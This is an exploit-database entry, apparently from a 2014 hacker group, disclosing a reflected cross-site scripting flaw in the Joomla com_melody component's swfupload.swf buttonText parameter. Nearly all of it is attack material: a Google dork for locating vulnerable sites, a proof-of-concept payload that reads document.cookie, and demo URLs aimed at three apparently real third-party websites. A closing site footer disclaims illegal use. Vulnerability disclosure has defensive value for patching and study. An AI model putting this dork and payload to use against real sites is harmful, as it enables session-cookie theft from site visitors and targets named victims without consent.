[+] Author: TUNISIAN CYBER [+] Exploit Title: Joomla Component com_melody XSS Vulnerability [+] Date: 09-01-2014 [+] Category: WebApp [+] Google Dork: :inurl:"components/com_melody/" [+] Tested on: KaliLinux [+} Friend's blog: www.na3il.com ######################################################################################## +Exploit: The Joomla melody component suffers from an xss vulnerability. +P.O.C: 127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a> Demo: http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a> ./3nD ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论